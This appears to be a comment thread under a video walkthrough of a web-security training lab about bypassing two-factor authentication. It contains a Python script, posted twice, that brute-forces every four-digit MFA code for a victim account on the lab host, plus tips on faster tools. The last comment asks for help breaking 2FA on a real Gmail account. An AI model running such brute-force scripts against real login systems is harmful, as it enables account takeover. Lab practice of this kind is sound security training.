# Try the below script import itertools import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def generate_permutations(): # Generate all permutations of digits 0 to 9 for a 4-digit number permutations = itertools.product(range(10), repeat=4) # List of all variables which will be taken in use all_permutations = [] user = "carlos" url = "0ae0002103a505e782995b19007a00dc.web-security-academy.net" url1 = url + "/login2" url2 = url + "/login2" headers = {'Cookie': 'verify='+ user} s = requests.Session() # Making of request in order to request a security code r = s.get(url1, headers=headers, verify=False) if "Please enter your 4-digit security code" in r.text: print("A security code has been requested for the user :-" + user) # Print as well as shoot a http post request with every permutations for perm in permutations: current_permutation = "".join(map(str, perm)) all_permutations.append(current_permutation) print(current_permutation) r2 = s.post(url2, headers=headers, data={'mfa-code': current_permutation}, verify=False, allow_redirects=False) if "Incorrect security code" in r2.text: continue elif r2.status_code==302: return "Try this code :- " + current_permutation break else: print("Something is wrong") with open("result.txt", "w") as file: file.write(r2.text + "|" + r2.status_code + " ") # Return all permutations def main(): # Get all permutations all_permutations = generate_permutations() # Print the number of possibilities print(all_permutations)
I spent a couple days figuring out why it was so slow with Community edition. Then installed and found out how to use Turbo Intruder extension and solved it in half an hour.
Is it possible to develop a python script to perform a similar action performed by Burpsuite Pro - Intruder? Community edition intruder it's too slow, in the meanwhile the session lab expire...
I think it may be unsolvable with the Community edition, the lab site expired before I could get to 1000 codes out of 9999 possible.
# Try the below script
import itertools
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generate_permutations():
# Generate all permutations of digits 0 to 9 for a 4-digit number
permutations = itertools.product(range(10), repeat=4)
# List of all variables which will be taken in use
all_permutations = []
user = "carlos"
url = "0ae0002103a505e782995b19007a00dc.web-security-academy.net"
url1 = url + "/login2"
url2 = url + "/login2"
headers = {'Cookie': 'verify='+ user}
s = requests.Session()
# Making of request in order to request a security code
r = s.get(url1, headers=headers, verify=False)
if "Please enter your 4-digit security code" in r.text:
print("A security code has been requested for the user :-" + user)
# Print as well as shoot a http post request with every permutations
for perm in permutations:
current_permutation = "".join(map(str, perm))
all_permutations.append(current_permutation)
print(current_permutation)
r2 = s.post(url2, headers=headers, data={'mfa-code': current_permutation}, verify=False, allow_redirects=False)
if "Incorrect security code" in r2.text:
continue
elif r2.status_code==302:
return "Try this code :- " + current_permutation
break
else:
print("Something is wrong")
with open("result.txt", "w") as file:
file.write(r2.text + "|" + r2.status_code + "
")
# Return all permutations
def main():
# Get all permutations
all_permutations = generate_permutations()
# Print the number of possibilities
print(all_permutations)
if __name__ == "__main__":
main()
Use fuff. Copy command as curl payload. Then make minor adjustments.
Check payload with proxy. I still can’t solve it lol. I get all 200 http resp
I spent a couple days figuring out why it was so slow with Community edition. Then installed and found out how to use Turbo Intruder extension and solved it in half an hour.
what!?!? 10,000 posibilities. No way, I cannot do this with Burp Suite Community Edition. It takes many years :(
I do like your explanation, Michael!
Some site use token as variable so every login must be with new request token
The brute Force of yours is so fast. Mine is very slow. Have you changed the video speed for this brute Force scene?
He is using professional version
hello, i have the community edition version of burp, is that why it is very slow when i do some operation with the intruder?
Yes. This version is slower an limited
goood!!!! thanks!!!! 감사합니다 한글이 없어서 댓글 남기고 가요
I don't understand what the "send to repeater" step means. Can I use "send to intruder" from the beginning?
If you watch the video you will see that „Send to Repeater“ is an option in Burp 😉
@@Michael10Sommer i understrand. Thank you.
@@ucminhnguyen5610 you have to send it to repeater and a send request through to generate a code for Carlos’ account.
@@datparkournoob5188 thank you, i understand
Is it possible to develop a python script to perform a similar action performed by Burpsuite Pro - Intruder?
Community edition intruder it's too slow, in the meanwhile the session lab expire...
yes, it will not be as fast as the intruder but it will probably be fast enough.
Use Turbo intruder
i cannot catch what you saying, even using closed caption not helping me.thanks
i thought the second step need to skip, never thought it's the first step.
no, it is crucial, without second step the system wont generate code for Carlos.
It didn't worked I tried the exact steps even the parameter is same but it didn't worked
in the second step, maybe you sent POST /login2 instead of GET /login2, control it.
Community is tooooooooo slow😢
Whats the logic behind signing in again in wiener's account and putting wrong 2FA code ?
We already had responses.
Anyone
Just to see the happy path of 2FA login
\o/
Hello bro can you recover my gmail id broke 2fa in my gmail please🙏🙏🙏